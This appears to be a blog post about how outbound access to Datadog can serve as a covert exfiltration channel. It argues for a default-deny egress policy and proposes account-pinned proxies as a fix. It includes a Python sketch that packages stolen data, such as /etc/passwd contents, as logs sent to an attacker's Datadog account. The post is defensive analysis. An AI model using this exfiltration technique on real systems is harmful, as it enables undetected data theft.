In my current job, we are evaluating Datadog as the repository for the metrics and logs being generated by our SaaS application, which is hosted in AWS.
We have taken a security-first approach in our design for the AWS accounts and infrastructure surrounding our app, which means among other things that we are not allowing any of our EC2 instances unfettered outbound access to the internet. Instead, we are specifically whitelisting the services and ports to which our instances can connect.
There are three reasons to have a default-deny policy for outbound network connections:
- Preventing third-party code running on our servers from connecting to anything without our knowledge.
- Preventing malware trying to gain a toehold on one of our servers from communicating with command-and-control servers.
- Making it harder for bad actors (human or software) to exfiltrate data from our servers.
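To make the default-deny posture concrete, here is a sketch of what it looks like in a Terraform security group. Everything here is illustrative: the resource name, the variable, and the CIDR range (a reserved documentation range) are placeholders, not our actual configuration. The key point is that AWS security groups allow all outbound traffic unless you declare egress rules, at which point only the declared rules apply.

```hcl
# Illustrative only: a security group with no general outbound access.
# Declaring any egress block replaces AWS's implicit allow-all egress,
# so the only outbound traffic permitted is what we list explicitly.
resource "aws_security_group" "app" {
  name   = "app-deny-by-default"
  vpc_id = var.vpc_id # assumed to be defined elsewhere

  # Allow HTTPS to one approved address range and nothing else.
  egress {
    description = "HTTPS to an approved external service"
    from_port   = 443
    to_port     = 443
    protocol    = "tcp"
    cidr_blocks = ["203.0.113.0/24"] # placeholder (TEST-NET-3)
  }
}
```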
Unfortunately, Datadog makes this hard.
The Datadog endpoints to which the agent running on our servers must connect resolve to multiple IP addresses, any of which could change at any time, so IP whitelisting is not a practical way to allow our servers to reach them.
Datadog’s recommendation for how to address this is for us to deploy a proxy server such as Squid or HAProxy in our environment, give that proxy outbound access to the internet on the necessary ports, and route Datadog traffic through it. This solves the specific problem of getting data from our servers to Datadog.
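For the Squid variant of this setup, the proxy’s access rules would look something like the following. This is a sketch, not a complete configuration: the domain is the one Datadog endpoints generally live under, but the actual set of hostnames and ports your agent version needs should be taken from Datadog’s documentation.

```
# Sketch of a Squid policy that only proxies traffic to Datadog.
# Destination-domain matching; ".datadoghq.com" matches subdomains.
acl datadog dstdomain .datadoghq.com

http_access allow datadog
http_access deny all
```

Note that this restricts *where* the proxy will forward traffic, not *whose account* that traffic lands in, which is exactly the gap discussed next.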
However, as far as I can tell, neither whitelisting Datadog’s IPs (if that were possible) nor routing Datadog traffic through a proxy solves a larger problem: if we provide a conduit for outbound connections to Datadog from our servers, then any outbound Datadog connections, even connections for a different Datadog account, can use that conduit.
In other words, I believe that allowing outbound connections to Datadog allows anyone who compromises any of our servers to exfiltrate any data they want through Datadog, simply by (a) creating a free Datadog trial account and (b) sending the data as logs to Datadog using their trial account’s API key.
Furthermore, this data exfiltration would be nearly undetectable, since it would be going to servers we expect our servers to be sending data to, on ports we expect them to be sending data on.
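To make the attack concrete, here is a sketch of what the exfiltration step would look like. The endpoint is Datadog’s public HTTP log intake; the API key is a placeholder standing in for one from the attacker’s free trial account. Nothing is actually sent here; the point is that this request is indistinguishable, at the network layer, from our own agent’s traffic.

```python
import json
import urllib.request

# Datadog's public HTTP log intake endpoint.
INTAKE_URL = "https://http-intake.logs.datadoghq.com/api/v2/logs"
# Placeholder: in the attack, this is the key from the attacker's
# own free trial account, not ours.
ATTACKER_API_KEY = "0123456789abcdef0123456789abcdef"

def build_exfil_request(stolen_data: str) -> urllib.request.Request:
    """Package arbitrary data as an innocuous-looking log entry."""
    body = json.dumps([{"message": stolen_data, "service": "web"}])
    return urllib.request.Request(
        INTAKE_URL,
        data=body.encode(),
        headers={
            "Content-Type": "application/json",
            "DD-API-KEY": ATTACKER_API_KEY,  # attacker's key, not ours
        },
        method="POST",
    )

# Same destination, same port, same protocol as legitimate agent
# traffic -- only the API key (and hence the receiving account) differs.
req = build_exfil_request("contents of /etc/passwd, say")
```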
At least one of Datadog’s competitors addresses this by assigning known, static IP addresses and ports to specific customers, such that any data sent to one of the assigned address/port pairs is guaranteed to go into a specific customer’s account. Customers can then whitelist only those specific IP addresses and ports in their outbound firewall rules. Datadog could perhaps use a similar approach, assigning dedicated IPs to specific customers, presumably for a fee.
Another way to solve this problem would be for Datadog to provide its own, custom proxy which pegs the traffic passing through it to a single Datadog account. Using the proxy to exfiltrate data into a different Datadog account would then be impossible.
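The core check such a proxy would perform is simple. This is entirely hypothetical, since Datadog offers no such proxy today: the proxy is configured with the one API key it will forward traffic for, and any request bearing a different key is refused, so the conduit cannot feed another account.

```python
# Hypothetical sketch: the account-pinning check an "official" Datadog
# proxy could apply to each outbound request before forwarding it.
PINNED_API_KEY = "0123456789abcdef0123456789abcdef"  # our account's key

def enforce_account(headers: dict[str, str]) -> dict[str, str]:
    """Forward a request only if it carries our pinned API key."""
    if headers.get("DD-API-KEY") != PINNED_API_KEY:
        raise PermissionError("request does not carry the pinned API key")
    return headers
```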
I’m writing about this here because when this issue occurred to me, I did a bit of digging around the net to see whether anyone else had already written about it, and I couldn’t find anything. If you know of someone else having written about this, please post a comment below or email me.
Am I missing something here which makes this concern specious? Let me know in the comments if you think so.